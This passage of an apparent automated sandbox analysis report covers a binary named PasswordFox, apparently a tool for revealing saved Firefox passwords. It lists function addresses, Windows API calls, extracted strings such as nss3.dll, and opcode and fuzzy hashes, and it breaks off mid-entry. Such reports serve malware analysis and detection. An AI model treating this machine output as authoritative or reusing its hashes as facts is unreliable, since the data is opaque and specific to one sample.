                                        • Instruction ID: cbdc72f835ec40b1a9f09e3827ef75c6f5dd66271c9025d1e777cdb294447511
                                        • Opcode Fuzzy Hash: 0d439ffa7403bd6a08bb45c8a3cbc549325788cddd5a42741ac006f5ebea398b
                                        • Instruction Fuzzy Hash: 8F119872600314DBDB20AB61DD89FDB73ACAB44714F00467EB655F20D1DE7499C4CB18
                                        Function 0040327E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003ED), ref: 00403292
                                          • Part of subcall function 0040AE7B: LoadLibraryW.KERNEL32(shlwapi.dll,?,75C08FB0,0040329A,00000000), ref: 0040AE84
                                          • Part of subcall function 0040AE7B: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AE92
                                          • Part of subcall function 0040AE7B: FreeLibrary.KERNEL32(00000000,?,75C08FB0,0040329A,00000000), ref: 0040AEAA
                                        • GetDlgItem.USER32(?,00000000), ref: 004032A4
                                        • GetClientRect.USER32(?,?), ref: 004032BE
                                        • GetWindow.USER32(?,00000005), ref: 004032D6
                                        • GetWindow.USER32(00000000), ref: 004032D9
                                          • Part of subcall function 00401681: GetWindowRect.USER32(?,?), ref: 00401690
                                          • Part of subcall function 00401681: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004016AB
                                        • GetWindow.USER32(00000000,00000002), ref: 004032E5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ItemLibraryRect$AddressClientFreeLoadPointsProc
                                        • String ID:
                                        • API String ID: 3234410031-0
                                        • Opcode ID: 19e83884a2ee7bcb0f898122dba0e041090de0b75402a637d3d9c35095c9b5a5
                                        • Instruction ID: 0907ac9b8bc6d7e27030bb6e2dff600a5af15e0cceb477848a7b9f22fef3b328
                                        • Opcode Fuzzy Hash: 19e83884a2ee7bcb0f898122dba0e041090de0b75402a637d3d9c35095c9b5a5
                                        • Instruction Fuzzy Hash: 5801F732540304ABDB116F75CC85F6AB7ACDF81714F05053EF405BB192CB78E8028AA8
                                        Function 00401765 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00401774
                                        • GetSystemMetrics.USER32(00000015), ref: 00401782
                                        • GetSystemMetrics.USER32(00000014), ref: 0040178E
                                        • BeginPaint.USER32(?,?), ref: 004017A8
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004017B7
                                        • EndPaint.USER32(?,?), ref: 004017C4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 292dddb40828baa585e339de827616e00bf546c5eb8b0ca2adba6712cae4fb09
                                        • Instruction ID: 55c219b31556ee48f84dfb622686aa39c5a214c6181e0cdcb2aa5b1c7b7dc2c3
                                        • Opcode Fuzzy Hash: 292dddb40828baa585e339de827616e00bf546c5eb8b0ca2adba6712cae4fb09
                                        • Instruction Fuzzy Hash: 4A01EC72940218EFDF04DFA4DD99DEE7B79FB45301F000669AA11BA195DA71A904CF50
                                        Function 00401E52 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _ultow
                                        • String ID: 1.x$2.x$3.0$3.5/4.x
                                        • API String ID: 1931767806-1424242312
                                        • Opcode ID: f207b6e839b1df3a7169f756b8cf455114fe739a14a8fb7c8d175af763fcce0d
                                        • Instruction ID: 02c8f37c4b81fee256367eda243e214d3cedbeca486832de9933a17fac1f6805
                                        • Opcode Fuzzy Hash: f207b6e839b1df3a7169f756b8cf455114fe739a14a8fb7c8d175af763fcce0d
                                        • Instruction Fuzzy Hash: 57215331608106D6D6289564C8D45B962A4FB49308F74447FF90BBAAF2D33E9C83A69F
                                        Function 00408151 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00408172
                                        • qsort.MSVCRT ref: 0040821C
                                        • SetCursor.USER32(/nosort,?,00409514,00000000,00000000), ref: 0040822A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cursor_wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 318828055-1578091866
                                        • Opcode ID: 9bc2de069cfd0942ffb201b1a488b0b154d2f036f603e0570b304ca65c1d3d22
                                        • Instruction ID: 1f803aed3756b16d601d15c12b0bd80a41414de7efe4ceef327131479a4fa369
                                        • Opcode Fuzzy Hash: 9bc2de069cfd0942ffb201b1a488b0b154d2f036f603e0570b304ca65c1d3d22
                                        • Instruction Fuzzy Hash: AB21C571600901AFD714AB35CD81E56B3AAFF44324B11427EF459AB6D2CB7ABC11CB9C
                                        Function 00407282 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • memset.MSVCRT ref: 004072B9
                                          • Part of subcall function 0040AEE6: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004072DA,?,?), ref: 0040AF63
                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 00407303
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: c674596ebf4e7899330e9d8845ed25131606a9436a1293817c83f26c2674c8f5
                                        • Instruction ID: 297d790b4ee4be67ee861a093687659072f07b05dd7f99d777773fa9b6455ec5
                                        • Opcode Fuzzy Hash: c674596ebf4e7899330e9d8845ed25131606a9436a1293817c83f26c2674c8f5
                                        • Instruction Fuzzy Hash: CD116A32A00619BFDB10AB65CC82E99BB64FF44318F10017AF909765E2D739B960DBC8
                                        Function 00407457 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040747B
                                        • memset.MSVCRT ref: 00407492
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                          • Part of subcall function 00406B6D: wcscpy.MSVCRT ref: 00406B72
                                          • Part of subcall function 00406B6D: _wcslwr.MSVCRT ref: 00406B93
                                        • _snwprintf.MSVCRT ref: 004074CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" ?>
                                        • API String ID: 168708657-3296998653
                                        • Opcode ID: e34694b086e0bf41ba510f4761e636aa8c6a44e3b59148fe565d034de5e700d4
                                        • Instruction ID: 290e2b38c62671b794f7aa0fc07ebbdac2aa5992fadd5bb1de784251dcda24bb
                                        • Opcode Fuzzy Hash: e34694b086e0bf41ba510f4761e636aa8c6a44e3b59148fe565d034de5e700d4
                                        • Instruction Fuzzy Hash: E00184B2A40129A6DB20A755CC46FEA766CEF44708F0001B6BB08B61D2D778AB558A9C
                                        Function 00409261 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409282
                                        • RegisterClassW.USER32(?), ref: 004092A7
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004092AE
                                        • CreateWindowExW.USER32(00000000,PasswordFox,PasswordFox,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 004092CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: PasswordFox
                                        • API String ID: 2678498856-3917124896
                                        • Opcode ID: 08d77018fcc5259621cde43de3ead234b542cd646e7a97fcb6d40f43ac39ff38
                                        • Instruction ID: 6f9ea0a48d81faf65a5b1ad446710f0fefb0e05d23044ccaf7bf5c8251c2ff79
                                        • Opcode Fuzzy Hash: 08d77018fcc5259621cde43de3ead234b542cd646e7a97fcb6d40f43ac39ff38
                                        • Instruction Fuzzy Hash: 5701E2B1901228AAD7009F998D89AEFBEBCFB09750F10422AF514B2241D7B45A408BE8
                                        Function 0040428F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: 2f0fb7086bda5e790ecdc0800560db26cad3f57a8b40b3d9bf66697b22df90ad
                                        • Instruction ID: 776c58fbf7c65fbb3c3c50bed015f937b2f2766c9f1c10534292e0b53b83fb2e
                                        • Opcode Fuzzy Hash: 2f0fb7086bda5e790ecdc0800560db26cad3f57a8b40b3d9bf66697b22df90ad
                                        • Instruction Fuzzy Hash: E3F0A776540208A7CB11A794DC45FEA72ACFB84785F5401BBFA44F31C1DBB4AA848EAC
                                        Function 0040AABE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040AACC
                                        • wcscpy.MSVCRT ref: 0040AADD
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,00408B3C,?), ref: 0040AAFB
                                        • CloseHandle.KERNEL32(00000000), ref: 0040AB02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        • Opcode ID: c35c0e4411e9c0bae4f4cdc42271805fcb2936c57c2e84faf1b98a291f38b1c7
                                        • Instruction ID: b288ffba67365f667122ae65733a5cfe420aacf28884de5051f4db542595074b
                                        • Opcode Fuzzy Hash: c35c0e4411e9c0bae4f4cdc42271805fcb2936c57c2e84faf1b98a291f38b1c7
                                        • Instruction Fuzzy Hash: 24E092B2841210FEE31167709D49FBB759CDB54304F008936F989F21D2D7349910C6A9
                                        Function 0040AE7B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(shlwapi.dll,?,75C08FB0,0040329A,00000000), ref: 0040AE84
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AE92
                                        • FreeLibrary.KERNEL32(00000000,?,75C08FB0,0040329A,00000000), ref: 0040AEAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 145871493-1506664499
                                        • Opcode ID: b8414be58024a528ad254a3f03c2ca1d3c70a1656d6c2a54984c6476332d9e09
                                        • Instruction ID: 88f23f55ba44edd14ac6a26998637db1e2e399021e0a31f77314a211b95685ee
                                        • Opcode Fuzzy Hash: b8414be58024a528ad254a3f03c2ca1d3c70a1656d6c2a54984c6476332d9e09
                                        • Instruction Fuzzy Hash: 22D01235341210EFE6115765AC48AAF6995EFC56517050536F805F2190CB794806C5A9
                                        Function 00406061 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404991: memset.MSVCRT ref: 0040499F
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 0040607B
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060A2
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060C3
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00402501,?,0040933F,00000000,?,?,?,?,004095D3), ref: 004060E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID: ]`@
                                        • API String ID: 1860491036-2281983686
                                        • Opcode ID: 7787d27574b16b41ee946f052cd0b81836bc58a93589df7c726abc465762cb08
                                        • Instruction ID: bb79053ed80c21c91024aef997b06ed6156d87c8b6c9c343c5c52e338d759cba
                                        • Opcode Fuzzy Hash: 7787d27574b16b41ee946f052cd0b81836bc58a93589df7c726abc465762cb08
                                        • Instruction Fuzzy Hash: 6921E7B1A513008ED7118F2AC489916FBE4FF9032072AC9BFD119DB2B2D7B8C910DB59
                                        Function 00403473 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memsetwcslen$wcscatwcscpy
                                        • String ID: nss3.dll
                                        • API String ID: 1250441359-2492180550
                                        • Opcode ID: 9ac930dc2a80d7e69a3bead36ea84fd5b0d447b0053a5b8c6fddeaa094ea053a
                                        • Instruction ID: 6a167fd0f76e7434a3772663e2e7e167b9492e56f061347703c305cb68191714
                                        • Opcode Fuzzy Hash: 9ac930dc2a80d7e69a3bead36ea84fd5b0d447b0053a5b8c6fddeaa094ea053a
                                        • Instruction Fuzzy Hash: 8B11BCB290421DA6DB20EB60EC45BDA77ACDB14315F1004BBFA0CF21C2F7799B448A9D
                                        Function 004056FE Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 00405710
                                        • GetWindowRect.USER32(?,?), ref: 0040571D
                                        • GetClientRect.USER32(00000000,?), ref: 00405728
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00405738
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405754
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: f7d617383d5d46ee9949b15d40646a99b14b7b9cf5e3cbe253016311cf744b81
                                        • Instruction ID: c1099f685b2fa3922c57bb52ca224cb94c15c54d8079a5ba9e99989863c45627
                                        • Opcode Fuzzy Hash: f7d617383d5d46ee9949b15d40646a99b14b7b9cf5e3cbe253016311cf744b81
                                        • Instruction Fuzzy Hash: AB014832800129BBDB11ABA59D89EFFBFBCEF46710F04412AF905F6181D7789501CBA5
                                        Function 00406108 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 7f1bfc16a435ee2c376b3b1f8993d54539eb187a6cd946df2ae9db6f882e4b7a
                                        • Instruction ID: 535675ec4a3531a1875528eff0eaecfc24ef5fe0f09a09dbf848e59b9a8c828f
                                        • Opcode Fuzzy Hash: 7f1bfc16a435ee2c376b3b1f8993d54539eb187a6cd946df2ae9db6f882e4b7a
                                        • Instruction Fuzzy Hash: 81F0FF725047459BD720AFAA98C581BF7D9FB543287A1483FF14AE7782C73CA890465C
                                        Function 0040338F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000006), ref: 004033A8
                                          • Part of subcall function 004016C5: GetDlgItem.USER32(?,?), ref: 004016D5
                                          • Part of subcall function 004016C5: GetClientRect.USER32(?,?), ref: 004016E7
                                          • Part of subcall function 004016C5: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401751
                                        • EndDeferWindowPos.USER32(?), ref: 0040341F
                                        • InvalidateRect.USER32(?,?,00000001), ref: 0040342A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        • Opcode ID: cc2ccad6b08ee690cac38e68b376404d6851d77fa30cea87fc7c3548280c1051
                                        • Instruction ID: 7b31135a1e6ee326e2dac3ef47a8fc26cefe41ebc6cdb21986f718c968779d92
                                        • Opcode Fuzzy Hash: cc2ccad6b08ee690cac38e68b376404d6851d77fa30cea87fc7c3548280c1051
                                        • Instruction Fuzzy Hash: B7218670A00148FFDB226F52CC89D6F3EBCEB85B98F10402AF4017A2A1D6795F00DA68
                                        Function 004074EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040750F
                                        • memset.MSVCRT ref: 00407526
